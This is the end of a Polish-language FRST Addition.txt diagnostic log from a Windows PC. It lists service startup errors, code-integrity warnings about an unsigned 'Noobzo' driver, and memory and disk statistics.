Description: Nie można uruchomić usługi Ochrona oprogramowania z powodu następującego błędu: Usługa nie została uruchomiona z powodu nieudanego logowania.

Error: (06/13/2017 12:20:01 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Usługa sppsvc nie może zalogować się jako NT AUTHORITY\NetworkService za pomocą obecnie skonfigurowanego hasła z powodu następującego błędu: Żądanie nie jest obsługiwane. Aby upewnić się, że usługa jest skonfigurowana prawidłowo, użyj przystawki Usługi w programie Microsoft Management Console (MMC).

Error: (06/13/2017 12:20:00 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi Instalator Windows z powodu następującego błędu: Usługa nie została uruchomiona z powodu nieudanego logowania.

Error: (06/13/2017 12:20:00 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Usługa msiserver nie może zalogować się jako NT AUTHORITY\SYSTEM za pomocą obecnie skonfigurowanego hasła z powodu następującego błędu: Żądanie nie jest obsługiwane. Aby upewnić się, że usługa jest skonfigurowana prawidłowo, użyj przystawki Usługi w programie Microsoft Management Console (MMC).

Error: (06/13/2017 12:18:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Usługa Szybka instalacja pakietu Microsoft Office niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

Error: (06/13/2017 12:18:01 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Ochrona oprogramowania niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

CodeIntegrity:
===================================
Date: 2017-06-13 12:01:58.979
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-06-13 12:01:58.949
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-06-13 11:50:21.367
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-06-13 11:50:21.352
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-06-12 22:31:24.826
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-06-12 22:31:24.794
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-12 22:20:12.347
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\agrsm64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2017-05-12 22:20:12.327
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\agrsm64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM)2 Duo CPU T9600 @ 2.80GHz
Procent pamięci w użyciu: 56%
Całkowita pamięć fizyczna: 4060.27 MB
Dostępna pamięć fizyczna: 1765.94 MB
Całkowita pamięć wirtualna: 6106.45 MB
Dostępna pamięć wirtualna: 3631.34 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:232.79 GB) (Free:104.6 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 78DF78DF)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=232.8 GB) - (Type=07 NTFS)

==================== Koniec Addition.txt ============================